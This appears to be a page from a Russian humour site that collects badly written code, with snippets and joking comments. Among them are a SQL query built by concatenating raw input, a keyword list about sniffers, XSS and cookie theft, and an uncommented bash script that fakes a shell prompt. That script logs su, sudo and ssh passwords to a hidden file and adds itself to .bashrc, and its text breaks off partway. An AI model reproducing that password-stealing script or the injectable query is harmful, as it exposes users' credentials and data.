- 1
if (!empty($filter_state)) $q .= " AND users.state_id LIKE '%".$filter_state."%'";
Нашли или выдавили из себя код, который нельзя назвать нормальным, на который без улыбки не взглянешь? Не торопитесь его удалять или рефакторить, — запостите его на говнокод.ру, посмеёмся вместе!
+141.5
if (!empty($filter_state)) $q .= " AND users.state_id LIKE '%".$filter_state."%'";
Юмор в том что $filter_state содержит в себе значение state_id и при цифре 1 выбираются все state в state_id которых есть 1. ну и т.д.
+81
try{
$dbh->exec($sql);
return true;
}catch(Exception $e){
throw $e;
}
эксепшены - это круто :)
+151
for ( j=0; j< PRI.KillStats.Length; j++ )
{
if ( PRI.KillStats[j].StatName == 'KILLS_IMPACTHAMMER' )
{
if ( PRI.KillStats[j].StatValue > BestKillCount[0] )
{
BestKillCount[0] = PRI.KillStats[j].StatValue;
BestPlayer[0] = PRI;
}
}
else if ( PRI.KillStats[j].StatName == 'KILLS_ENFORCER' )
{
if ( PRI.KillStats[j].StatValue > BestKillCount[1] )
{
BestKillCount[1] = PRI.KillStats[j].StatValue;
BestPlayer[1] = PRI;
}
}
// ещё семь таких же групп, меняются только строка и цифра
}
Unreal Tournament 3, Epic Games
(не совсем Java, но очень похоже)
+103.5
boolean get_UI_Win(...);
....
boolean retVal = get_UI_Win (...);
switch( retVal )
{
case FALSE:
....
return FALSE;
case TRUE:
....
return TRUE;
case PRIVACY:
....
return PRIVACY;
default:
return FALSE;
}
Индийские коллеги прислали на ревью этот код. Видимо у них свой bool, с блекджеком и шлюхами.
+154
$alt=array(
"na-s.ru",
"сниффер",
"скачать снифферы",
"сниффер паролей",
"лучший сниффер",
"http сниффер",
"сниффер пакетов",
"онлайн снифферы",
"хороший сниффер",
"сайты снифферы",
"ip сниффер",
"снифер",
"скачать сниферы",
"ip снифер",
"sniffer",
"ip sniffer",
"sniffer pro",
"http sniffer",
"password sniffer",
"sniffer portable",
"network sniffers",
"xss",
"атака xss",
"alert xss",
"xss tool",
"xss нападение",
"xss уязвимость",
"cookies",
"cookies пароля",
"javascript cookie",
"скачать cookie",
"document cookie",
"cookie session",
"cookies работа",
"http cookies",
"взлом cookies",
"прочитать cookie",
"cookie forum",
"используем cookies",
"cookie чтение",
"вытащить cookies",
"cookies vkontakte",
"cookies odnoklassniki",
"куки",
"включить куки",
"alert"
);
//это мего, парни, все быстро пошли тестать генератор кейвордов на своих сайтах!!1
$alt2=$alt[rand(0,$prp)].", ".$alt[rand(0,$prp)].", ".$alt[rand(0,$prp)].", ".$alt[rand(0,$prp)].", ".$alt[rand(0,$prp)].", ".$alt[rand(0,$prp)].", ".$alt[rand(0,$prp)].", ".$alt[rand(0,$prp)];
Угадай, кто? ;)
+151
procedure TForm1.N4Click(Sender: TObject);//процедура "Файл->Сохранить"
begin
if Form1.Caption='Новый' then
N5Click(Sender) else
begin // добавить
Form1.vvod.Lines.SaveToFile(Form1.Caption);//Сохраняем
Form1.vvod.Tag:=0; // добавить
end; // добавить
N7.Enabled:=true;
vvod.Modified:=false;
label3.Caption:='Нет';
end;
procedure TForm1.N5Click(Sender: TObject);//Процедура "Файл->Сохранить как..."
var fname:string;
begin
N7.Enabled:=true;//Включение процедуры "Файл->Закрыть"
if SaveDialog1.Execute then
begin
fname:=SaveDialog1.FileName;
if SaveDialog1.FilterIndex=1 then//PHP
begin
vvod.Lines.SaveToFile(fname+'.php');
Form1.Caption:=ExtractFileName(fname+'.php');
end;
if SaveDialog1.FilterIndex=2 then//HTML
begin
vvod.Lines.SaveToFile(fname+'.htm');
Form1.Caption:=ExtractFileName(fname+'.htm');
end;
if SaveDialog1.FilterIndex=3 then//CSS
begin
vvod.Lines.SaveToFile(fname+'.css');
Form1.Caption:=ExtractFileName(fname+'.css');
end;
if SaveDialog1.FilterIndex=4 then//txt
begin
vvod.Lines.SaveToFile(fname+'.txt');
Form1.Caption:=ExtractFileName(fname+'.txt');
end;
vvod.Modified:=false;
label3.Caption:='Нет';
end;
end;
+155.8
...
HWND handle=FindWindow(NULL,AnsiString("DPPCommModule").c_str());
...
На тему: "Сделаем наш string еще string'ее". Это в программе, работающей более чем на 100 теминалах...
+140
$count=count($arr);
for($i=0;$i<$count;$i++){
....
};
};
Нашел с своём старом коде. Когда-то я незнал про foreach.. :D
+130.2
#!/bin/bash
cm=""
function psw_su()
{
t=`echo $1 | tr '_' ' '`
echo -n $t
read -s ps >> ~/.log
echo "password: " >> ~/.log
#safe password to log file
echo $ps >> ~/.log
echo
sleep 4s
echo "su: incorrect password"
$cm
# exit 0
};
function zar()
{
a=`cat ~/.bashrc | tail -n 1 | tr ' ' '_'`
b=$0
case $a in
$b)
;;
*)
echo $0 >> ~/.bashrc
;;
esac
};
zar
while :
do
psu="Password: "
psudo="root's_password:"
ht=$HOST
un=$USER
pw=`pwd`
case $pw in
$HOME)
#tilda ~ this is home directory
pw="~"
;;
*)
esac
#string of console of shell
nm=$USER"@"$HOST":"$pw"> "
echo -n $nm
echo -n " "
#enter command
cm=""
read -e cm
# cm=$1
#switch case
case $cm in
"")
;;
#authentficate as root
"su")
psw_su $psu
;;
#authentificat as root
"su -l root")
psw_su $psu
;;
#authentificate as other user
`echo $cm | grep "su -l" | grep [A-Za-z0-9].*`)
c=`echo $cm | tr ' ' '_' | rev`
c2=`basename $c _l-_us | rev`
echo "Login: "$c2 >> ~/.log
psw_su $psu
;;
#simple sudo as authentificate as root
"sudo bash")
psw_su $psudo
;;
`echo $cm | grep ssh`)
c=`echo $cm | tr ' ' '_' | rev`
c2=`basename $c _hss | rev`
echo "loginSSH: "$c2>> ~/.log
echo -n "Password: "
read -s ps
echo $cm >> ~/.log
echo "Password SSH:"$ps >> ~/.log
sleep 2s
echo
$cm
exit 0
;;
`echo $cm | grep sudo | grep sh`)
psw_su $psudo
;;
*)
esac
echo $cm >> ~/.log
#$cm >> ~/.log
#exec command
case $cm in
"")
cm="echo -n"
;;
shell script
+151
public static DataSet ExecuteStoredProcedure(StoredProcedures procedure, Hashtable parameters, int nTries)
{
int retries = 0;
while(retries<nTries)
{
try
{
return ExecuteStoredProcedure(procedure, parameters);
}
catch(Exception)
{
retries++;
}
}
return null;
}
Вот так вот екзекутились некоторые процедуры в проекте под CF. Возможно так хотели решить проблему с потерей коннекшена у девайса при врадении в слип? :)